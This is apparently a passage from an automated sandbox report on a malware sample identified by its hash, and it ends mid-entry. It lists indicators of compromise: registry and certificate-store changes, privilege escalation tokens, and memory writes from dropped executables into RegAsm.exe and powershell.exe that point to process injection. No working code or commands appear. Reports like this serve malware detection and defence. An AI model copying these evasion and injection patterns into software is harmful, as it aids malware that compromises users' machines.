\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2492 = "Aus Central W. Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" 471.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" 471.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" 471.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2142 = "Transbaikal Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" 471.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Modifies registry class 29 IoCs
Processes:
explorer.exeSearchUI.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23" SearchUI.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance explorer.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana SearchUI.exe Set value (data) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133529852035183827" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002c100000000000002000000e80703004100720067006a006200650078002000200033000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074ae2078e323294282c1e41cb67d5b9c000000000000000000000000f11d7815e27bda0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e80703004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c00000000000000000000000036466015e27bda0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e80702004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc7600000000000000000000000002e36fa2b164da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchUI.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exepid process 2836 d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exe 2836 d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exe 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 3284 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exeeiwisawpid process 2836 d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exe 1820 eiwisaw -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
RegAsm.exepowershell.exe471.exeexplorer.exepowershell.exedescription pid process Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeDebugPrivilege 1576 RegAsm.exe Token: SeDebugPrivilege 3720 powershell.exe Token: SeShutdownPrivilege 3284 Token: SeCreatePagefilePrivilege 3284 Token: SeDebugPrivilege 1544 471.exe Token: SeImpersonatePrivilege 1544 471.exe Token: SeShutdownPrivilege 1236 explorer.exe Token: SeCreatePagefilePrivilege 1236 explorer.exe Token: SeShutdownPrivilege 1236 explorer.exe Token: SeCreatePagefilePrivilege 1236 explorer.exe Token: SeShutdownPrivilege 1236 explorer.exe Token: SeCreatePagefilePrivilege 1236 explorer.exe Token: SeShutdownPrivilege 1236 explorer.exe Token: SeCreatePagefilePrivilege 1236 explorer.exe Token: SeDebugPrivilege 3588 powershell.exe Token: SeShutdownPrivilege 1236 explorer.exe Token: SeCreatePagefilePrivilege 1236 explorer.exe Token: SeShutdownPrivilege 1236 explorer.exe Token: SeCreatePagefilePrivilege 1236 explorer.exe Token: SeShutdownPrivilege 1236 explorer.exe Token: SeCreatePagefilePrivilege 1236 explorer.exe Token: SeShutdownPrivilege 1236 explorer.exe Token: SeCreatePagefilePrivilege 1236 explorer.exe Token: SeShutdownPrivilege 1236 explorer.exe Token: SeCreatePagefilePrivilege 1236 explorer.exe Token: SeShutdownPrivilege 1236 explorer.exe -
Suspicious use of FindShellTrayWindow 44 IoCs
Processes:
explorer.exepid process 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe -
Suspicious use of SendNotifyMessage 23 IoCs
Processes:
explorer.exepid process 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe 1236 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
SearchUI.exepid process 2140 SearchUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exe4265.execmd.exeF8F6.exe471.exe471.execmd.execsrss.exedescription pid process target process PID 3284 wrote to memory of 216 3284 cmd.exe PID 3284 wrote to memory of 216 3284 cmd.exe PID 216 wrote to memory of 2100 216 cmd.exe reg.exe PID 216 wrote to memory of 2100 216 cmd.exe reg.exe PID 3284 wrote to memory of 5008 3284 4265.exe PID 3284 wrote to memory of 5008 3284 4265.exe PID 3284 wrote to memory of 5008 3284 4265.exe PID 5008 wrote to memory of 4384 5008 4265.exe RegAsm.exe PID 5008 wrote to memory of 4384 5008 4265.exe RegAsm.exe PID 5008 wrote to memory of 4384 5008 4265.exe RegAsm.exe PID 5008 wrote to memory of 4384 5008 4265.exe RegAsm.exe PID 5008 wrote to memory of 4384 5008 4265.exe RegAsm.exe PID 5008 wrote to memory of 4384 5008 4265.exe RegAsm.exe PID 5008 wrote to memory of 4384 5008 4265.exe RegAsm.exe PID 5008 wrote to memory of 4384 5008 4265.exe RegAsm.exe PID 5008 wrote to memory of 4384 5008 4265.exe RegAsm.exe PID 3284 wrote to memory of 3504 3284 E6B5.exe PID 3284 wrote to memory of 3504 3284 E6B5.exe PID 3284 wrote to memory of 3504 3284 E6B5.exe PID 3284 wrote to memory of 1460 3284 cmd.exe PID 3284 wrote to memory of 1460 3284 cmd.exe PID 1460 wrote to memory of 8 1460 cmd.exe reg.exe PID 1460 wrote to memory of 8 1460 cmd.exe reg.exe PID 3284 wrote to memory of 4424 3284 F8F6.exe PID 3284 wrote to memory of 4424 3284 F8F6.exe PID 3284 wrote to memory of 4424 3284 F8F6.exe PID 4424 wrote to memory of 5064 4424 F8F6.exe RegAsm.exe PID 4424 wrote to memory of 5064 4424 F8F6.exe RegAsm.exe PID 4424 wrote to memory of 5064 4424 F8F6.exe RegAsm.exe PID 4424 wrote to memory of 1576 4424 F8F6.exe RegAsm.exe PID 4424 wrote to memory of 1576 4424 F8F6.exe RegAsm.exe PID 4424 wrote to memory of 1576 4424 F8F6.exe RegAsm.exe PID 4424 wrote to memory of 1576 4424 F8F6.exe RegAsm.exe PID 4424 wrote to memory of 1576 4424 F8F6.exe RegAsm.exe PID 4424 wrote to memory of 1576 4424 F8F6.exe RegAsm.exe PID 4424 wrote to memory of 1576 4424 F8F6.exe RegAsm.exe PID 4424 wrote to memory of 1576 4424 F8F6.exe RegAsm.exe PID 3284 wrote to memory of 1544 3284 mobsync.exe PID 3284 wrote to memory of 1544 3284 mobsync.exe PID 3284 wrote to memory of 1544 3284 mobsync.exe PID 1544 wrote to memory of 3720 1544 471.exe powershell.exe PID 1544 wrote to memory of 3720 1544 471.exe powershell.exe PID 1544 wrote to memory of 3720 1544 471.exe powershell.exe PID 4560 wrote to memory of 3588 4560 471.exe powershell.exe PID 4560 wrote to memory of 3588 4560 471.exe powershell.exe PID 4560 wrote to memory of 3588 4560 471.exe powershell.exe PID 4560 wrote to memory of 4340 4560 471.exe cmd.exe PID 4560 wrote to memory of 4340 4560 471.exe cmd.exe PID 4340 wrote to memory of 3860 4340 cmd.exe netsh.exe PID 4340 wrote to memory of 3860 4340 cmd.exe netsh.exe PID 4560 wrote to memory of 1556 4560 471.exe powershell.exe PID 4560 wrote to memory of 1556 4560 471.exe powershell.exe PID 4560 wrote to memory of 1556 4560 471.exe powershell.exe PID 4560 wrote to memory of 4028 4560 471.exe powershell.exe PID 4560 wrote to memory of 4028 4560 471.exe powershell.exe PID 4560 wrote to memory of 4028 4560 471.exe powershell.exe PID 4560 wrote to memory of 868 4560 471.exe csrss.exe PID 4560 wrote to memory of 868 4560 471.exe csrss.exe PID 4560 wrote to memory of 868 4560 471.exe csrss.exe PID 868 